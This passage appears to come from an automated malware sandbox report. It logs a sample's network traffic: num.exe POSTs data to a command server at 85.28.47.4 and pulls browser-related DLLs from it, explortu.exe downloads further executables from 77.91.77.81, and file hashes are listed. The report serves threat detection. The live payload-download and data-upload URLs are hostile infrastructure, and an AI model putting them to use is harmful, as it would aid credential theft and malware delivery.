                          cookie: OTZ=7616690_56_56__56_
                        • flag-us
                          DNS
                          99.201.58.216.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          Response
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          prg03s02-in-f99.1e100.net
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          lhr48s48-in-f3.1e100.net
                          99.201.58.216.in-addr.arpa
                          IN PTR
                          prg03s02-in-f3.1e100.net
                        • flag-us
                          DNS
                          4.47.28.85.in-addr.arpa
                          Remote address:
                          8.8.8.8:53
                          Request
                          4.47.28.85.in-addr.arpa
                          IN PTR
                          Response
                        • flag-us
                          DNS
                          beacons.gcp.gvt2.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          beacons.gcp.gvt2.com
                          IN A
                          Response
                          beacons.gcp.gvt2.com
                          IN CNAME
                          beacons-handoff.gcp.gvt2.com
                          beacons-handoff.gcp.gvt2.com
                          IN A
                          172.217.169.67
                        • flag-us
                          DNS
                          self.events.data.microsoft.com
                          Remote address:
                          8.8.8.8:53
                          Request
                          self.events.data.microsoft.com
                          IN A
                          Response
                          self.events.data.microsoft.com
                          IN CNAME
                          self-events-data.trafficmanager.net
                          self-events-data.trafficmanager.net
                          IN CNAME
                          onedscolprdwus05.westus.cloudapp.azure.com
                          onedscolprdwus05.westus.cloudapp.azure.com
                          IN A
                          20.189.173.6
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJ
                          Host: 85.28.47.4
                          Content-Length: 214
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 156
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----DBFIDGIIIJDBGDGDAKKF
                          Host: 85.28.47.4
                          Content-Length: 268
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 1520
                          Keep-Alive: timeout=5, max=99
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAF
                          Host: 85.28.47.4
                          Content-Length: 267
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 5416
                          Keep-Alive: timeout=5, max=98
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHC
                          Host: 85.28.47.4
                          Content-Length: 268
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 108
                          Keep-Alive: timeout=5, max=97
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE
                          Host: 85.28.47.4
                          Content-Length: 4815
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:28 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=96
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/sqlite3.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/sqlite3.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:29 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
                          ETag: "10e436-5e7eeebed8d80"
                          Accept-Ranges: bytes
                          Content-Length: 1106998
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHC
                          Host: 85.28.47.4
                          Content-Length: 675
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:29 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=94
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKF
                          Host: 85.28.47.4
                          Content-Length: 359
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:30 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=93
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                          Host: 85.28.47.4
                          Content-Length: 359
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:30 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=92
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/freebl3.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/freebl3.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:31 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "a7550-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 685392
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/mozglue.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/mozglue.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:31 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "94750-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 608080
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/msvcp140.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/msvcp140.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:32 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "6dde8-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 450024
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/nss3.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/nss3.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:32 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "1f3950-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 2046288
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/softokn3.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/softokn3.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "3ef50-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 257872
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          GET
                          http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1
                          Host: 85.28.47.4
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                          ETag: "13bf0-5e7ebd4425100"
                          Accept-Ranges: bytes
                          Content-Length: 80880
                          Content-Type: application/x-msdos-program
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH
                          Host: 85.28.47.4
                          Content-Length: 947
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=85
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC
                          Host: 85.28.47.4
                          Content-Length: 267
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Vary: Accept-Encoding
                          Content-Length: 2408
                          Keep-Alive: timeout=5, max=84
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                          Host: 85.28.47.4
                          Content-Length: 265
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=83
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • flag-ru
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----FHIEBKKFHIEGCAKECGHJ
                          Host: 85.28.47.4
                          Content-Length: 363
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=82
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • RU
                          POST
                          http://85.28.47.4/920475a59bac849d.php
                          num.exe
                          Remote address:
                          85.28.47.4:80
                          Request
                          POST /920475a59bac849d.php HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                          Host: 85.28.47.4
                          Content-Length: 270
                          Connection: Keep-Alive
                          Cache-Control: no-cache
                          Response
                          HTTP/1.1 200 OK
                          Date: Tue, 25 Jun 2024 08:50:34 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=81
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=UTF-8
                        • GB
                          POST
                          https://beacons.gcp.gvt2.com/domainreliability/upload
                          chrome.exe
                          Remote address:
                          172.217.169.67:443
                          Request
                          POST /domainreliability/upload HTTP/2.0
                          host: beacons.gcp.gvt2.com
                          content-length: 568
                          content-type: application/json; charset=utf-8
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                          accept-encoding: gzip, deflate, br
                          accept-language: en-US,en;q=0.9
                        • 147.45.47.155:80
                          http://147.45.47.155/ku4Nor9/index.php
                          http
                          explortu.exe
                          2.0kB
                          2.0kB
                          18
                          12

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://147.45.47.155/ku4Nor9/index.php

                          HTTP Response

                          200
                        • 77.91.77.81:80
                          http://77.91.77.81/cost/num.exe
                          http
                          explortu.exe
                          337.9kB
                          10.2MB
                          7280
                          7277

                          HTTP Request

                          GET http://77.91.77.81/cost/sarra.exe

                          HTTP Response

                          200

                          HTTP Request

                          GET http://77.91.77.81/cost/random.exe

                          HTTP Response

                          200

                          HTTP Request

                          GET http://77.91.77.81/well/random.exe

                          HTTP Response

                          200

                          HTTP Request

                          GET http://77.91.77.81/cost/num.exe

                          HTTP Response

                          200
                        • 216.58.204.78:443
                          https://www.youtube.com/account
                          tls, http2
                          chrome.exe
                          2.1kB
                          10.6kB
                          15
                          19

                          HTTP Request

                          GET https://www.youtube.com/account
                        • 216.58.204.78:443
                          www.youtube.com
                          tls, http2
                          chrome.exe
                          1.0kB
                          8.2kB
                          10
                          10
                        • 216.58.212.206:443
                          https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j
                          tls, http2
                          chrome.exe
                          4.2kB
                          62.9kB
                          45
                          61

                          HTTP Request

                          GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3Fcbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

                          HTTP Request

                          POST https://consent.youtube.com/_/ConsentUi/browserinfo?f.sid=8961433167468703326&bl=boq_identityfrontenduiserver_20240617.06_p0&hl=en&gl=GB&_reqid=31832&rt=j
                        • 142.250.187.196:443
                          www.google.com
                          tls
                          chrome.exe
                          953 B
                          4.6kB
                          8
                          9
                        • 85.28.47.4:80
                          http://85.28.47.4/920475a59bac849d.php
                          http
                          num.exe
                          196.4kB
                          5.4MB
                          3914
                          3901

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/sqlite3.dll

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/freebl3.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/mozglue.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/msvcp140.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/nss3.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/softokn3.dll

                          HTTP Response

                          200

                          HTTP Request

                          GET http://85.28.47.4/69934896f997d5bb/vcruntime140.dll

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200

                          HTTP Request

                          POST http://85.28.47.4/920475a59bac849d.php

                          HTTP Response

                          200
                        • 142.250.187.238:443
                          clients2.google.com
                          tls, http2
                          chrome.exe
                          1.1kB
                          8.2kB
                          11
                          11
                        • 172.217.169.46:443
                          play.google.com
                          tls, http2
                          chrome.exe
                          1.0kB
                          7.7kB
                          10
                          10
                        • 172.217.169.67:443
                          https://beacons.gcp.gvt2.com/domainreliability/upload
                          tls, http2
                          chrome.exe
                          2.3kB
                          6.9kB
                          15
                          16

                          HTTP Request

                          POST https://beacons.gcp.gvt2.com/domainreliability/upload
                        • 8.8.8.8:53
                          81.77.91.77.in-addr.arpa
                          dns
                          686 B
                          1.3kB
                          10
                          10

                          DNS Request

                          81.77.91.77.in-addr.arpa

                          DNS Request

                          8.8.8.8.in-addr.arpa

                          DNS Request

                          www.googleapis.com

                          DNS Response

                          142.250.187.234
                          142.250.187.202
                          142.250.200.42
                          172.217.169.74
                          142.250.179.234
                          172.217.16.234
                          172.217.169.42
                          142.250.178.10
                          216.58.204.74
                          216.58.201.106
                          142.250.180.10
                          216.58.212.234
                          172.217.169.10
                          142.250.200.10

                          DNS Request

                          234.187.250.142.in-addr.arpa

                          DNS Request

                          consent.youtube.com

                          DNS Response

                          216.58.212.206

                          DNS Request

                          fonts.gstatic.com

                          DNS Response

                          216.58.201.99

                          DNS Request

                          195.212.58.216.in-addr.arpa

                          DNS Request

                          196.187.250.142.in-addr.arpa

                          DNS Request

                          play.google.com

                          DNS Response

                          172.217.169.46

                          DNS Request

                          nexusrules.officeapps.live.com

                          DNS Response

                          52.111.236.22

                        • 8.8.8.8:53
                          155.47.45.147.in-addr.arpa
                          dns
                          608 B
                          1.3kB
                          9
                          9

                          DNS Request

                          155.47.45.147.in-addr.arpa

                          DNS Request

                          www.youtube.com

                          DNS Response

                          216.58.204.78
                          216.58.212.238
                          142.250.180.14
                          142.250.178.14
                          142.250.200.14
                          172.217.16.238
                          142.250.200.46
                          216.58.212.206
                          142.250.187.238
                          216.58.201.110
                          172.217.169.46
                          142.250.187.206
                          142.250.179.238

                          DNS Request

                          78.204.58.216.in-addr.arpa

                          DNS Request

                          www.gstatic.com

                          DNS Response

                          216.58.212.195

                          DNS Request

                          www.google.com

                          DNS Response

                          142.250.187.196

                          DNS Request

                          74.204.58.216.in-addr.arpa

                          DNS Request

                          clients2.google.com

                          DNS Response

                          142.250.187.238

                          DNS Request

                          46.169.217.172.in-addr.arpa

                          DNS Request

                          22.236.111.52.in-addr.arpa

                        • 142.250.187.196:443
                          www.google.com
                          https
                          chrome.exe
                          3.9kB
                          9.3kB
                          10
                          11
                        • 8.8.8.8:53
                          99.201.58.216.in-addr.arpa
                          dns
                          283 B
                          604 B
                          4
                          4

                          DNS Request

                          99.201.58.216.in-addr.arpa

                          DNS Request

                          4.47.28.85.in-addr.arpa

                          DNS Request

                          beacons.gcp.gvt2.com

                          DNS Response

                          172.217.169.67

                          DNS Request

                          self.events.data.microsoft.com

                          DNS Response

                          20.189.173.6

                        • 142.250.187.238:443
                          clients2.google.com
                          https
                          chrome.exe
                          2.5kB
                          8.1kB
                          9
                          12
                        • 224.0.0.251:5353
                          chrome.exe
                          204 B
                          3
                        • 216.58.212.206:443
                          www.youtube.com
                          https
                          chrome.exe
                          2.9kB
                          7.2kB
                          5
                          8
                        • 172.217.169.46:443
                          www.youtube.com
                          https
                          chrome.exe
                          3.5kB
                          7.1kB
                          10
                          11
                        • 172.217.169.46:443
                          www.youtube.com
                          https
                          chrome.exe
                          4.9kB
                          7.7kB
                          10
                          12
                        • 216.58.212.206:443
                          www.youtube.com
                          https
                          chrome.exe
                          2.8kB
                          3.7kB
                          8
                          10

                        MITRE ATT&CK Enterprise v15

                        Downloads

                        • C:\ProgramData\mozglue.dll

                          Filesize

                          593KB

                          MD5

                          c8fd9be83bc728cc04beffafc2907fe9

                          SHA1

                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                          SHA256

                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                          SHA512

                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                        • C:\ProgramData\nss3.dll

                          Filesize

                          2.0MB

                          MD5

                          1cc453cdf74f31e4d913ff9c10acdde2

                          SHA1

                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                          SHA256

                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                          SHA512

                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                          Filesize

                          216B

                          MD5

                          759835b5e4f154613d7c35159fef1d78

                          SHA1

                          0a20a10d9c3ad88b9d292eb131e2503eccffb529

                          SHA256

                          4044136b913f6b7f47fc5275f1e54ecca692a377b3e5f581994f3d1af524a456

                          SHA512

                          167f4225b9ca00581e68956b858a25d202ff873d9ca3a012e97373c1e4827c654b432f035bf49579546356beb110d6b5df6b8fb2e135dac432d6984ab38d955f

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                          Filesize

                          2KB

                          MD5

                          9822dab7e9ea478d852e32f3be90c5ff

                          SHA1

                          e0bcec7c807e2c8369c6f977e518615e3733d8d8

                          SHA256

                          8cf7876c57b4c5896872d6d7cc68e6b7a8e30bd27bdd4271d0a9a9fd246aba24

                          SHA512

                          175efae3fda01e3bd4b38467b50ad0c8ef73718159ee4c11c59a8e3e1462d03cfdcf7be5eef15e8addeb27f35829dcecf24f780c30244f675d8b9d1fb6ad1196

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                          Filesize

                          2KB

                          MD5

                          f5dbf8cbaa255aab06472945dd342419

                          SHA1

                          d6db708f22311e3811f6085de6c1eaa10ef5aeb1

                          SHA256

                          906f395ec821091a5b3c06166eb90d6d04ba3e85702aa13b24937b11e31c3213

                          SHA512

                          32b6838340e6bddca55b13440978e46194dc5ad9de1af67898a5828c667cc3e6f7439914e48ab1cbc304b14ed891f275cd4292511ece8df36672a5ba84deb09e

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                          Filesize

                          2B

                          MD5

                          d751713988987e9331980363e24189ce

                          SHA1

                          97d170e1550eee4afc0af065b78cda302a97674c

                          SHA256

                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                          SHA512

                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                          Filesize

                          692B

                          MD5

                          cc50257ffa6729876256eeed9dd77fac

                          SHA1

                          1f1000084b8bbc5454b90fcea94a8b220a23a682

                          SHA256

                          e6fd47a82ab68e12a0c9e0222df24279c71058305dd81ee4e724a5ac2778da1b

                          SHA512

                          16cd00f2d3d94df4217bbda232cc7da28b2f789973f4f2df5f48755e812737538eab99d6a841c4800a139268018b97fac742a53d4aeadb66ae4f5e0a2a3a9d6b

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                          Filesize

                          7KB

                          MD5

                          8edc8875a95273382e60f4bc55035d00

                          SHA1

                          2a6ffdc666e7eceb0b3f94370d5b3a156c913ac5

                          SHA256

                          9f3a22113340ee0cf9e9d38850a1328a611f03066991c8ce7b36481a712f028d

                          SHA512

                          05ce83c820bb8eb69413ae5c5d729d9b5a856fc83ebdfc3cfbc8ac46902123fc9fed227bac391b45f2c2f77af4f72838f06c1ea9aa3c2735513b504a1a66da3c

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                          Filesize

                          16KB

                          MD5

                          56dc89a7f221fdb2fed0cef12e4f2781

                          SHA1

                          5712a22f1176da7fcda5cc6294f8ade16858be55

                          SHA256

                          ccc4ea146dafcac5e8d5f3131ceafbea4c7762a84c4d6e12d275a4bb026541f4

                          SHA512

                          a4b6d82a5aa77799b4488ea82fc3e4121832930fd588e03cffe84d841121ea2317a4bfd550dcbd4cbb80d54024d9dc4c9cd3ba63292048ad176926b94e583e03

                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                          Filesize

                          281KB

                          MD5

                          17f9169c7e7efe95bf599a6b02e07fa4

                          SHA1

                          c35151e8e953267e73b0e66263d4cd3786cdcd0e

                          SHA256

                          ac92504fa64cb77f82dce0925429a5fb491639168ca62f9cf124bc895e948efb

                          SHA512

                          fa76de9d3e0fb993cf9e3cad0ebd11887246cea51f3d55d03e3ecfa09878f9e3e5f31b408f6959faaf2ad757b8266c1278c3281a5a01233bb27ea7482cf85edb

                        • C:\Users\Admin\AppData\Local\Temp\1000016001\222be12d3f.exe

                          Filesize

                          2.4MB

                          MD5

                          bdc88ebff2c97c43a231763acc85fce5

                          SHA1

                          773969dbc2a235a04dfdf951b56d86a98d629409

                          SHA256

                          740fa213c3d59c6f0d33a0020a901d1fd9e50f6746438ad02b2d8c66b083c739

                          SHA512

                          a1344b83a3620ffc42382ea47199a96c97e0589b2d3791517f593bbc6c25b452954a88a32521e8244ffa57e49c4aeb174963db4f1c6fa6a19f88b0a461dd056e

                        • C:\Users\Admin\AppData\Local\Temp\1000017001\41c790c7b2.exe

                          Filesize

                          2.3MB

                          MD5

                          4ac315900ef59fdca54013ad4e9cdd8a

                          SHA1

                          4f57bcad4435e12626ef4dde276f964bd1b372cc

                          SHA256

                          0fce9a56a8ce16de9420fb67e2bcfbabaef83a36178293383a36c9f9843e0f41

                          SHA512

                          ed5db011dc71a2d84adf88740b5efa96ab77bb87e67e1f300491ca36536d55c7376367ac2c0111bf2bc7fae65bd375182fc7faa2d4ea2f9c22a87157f0bd2fbc

                        • C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe

                          Filesize

                          2.4MB

                          MD5

                          26a77a61fb964d82c815da952ebedb23

                          SHA1

                          8d9100fcc2e55df7c20954d459c1a6c5861228a1

                          SHA256

                          2e1662bc8b93a8cea652f916afa628ce5646e3b62d15cf584188f7df066dca73

                          SHA512

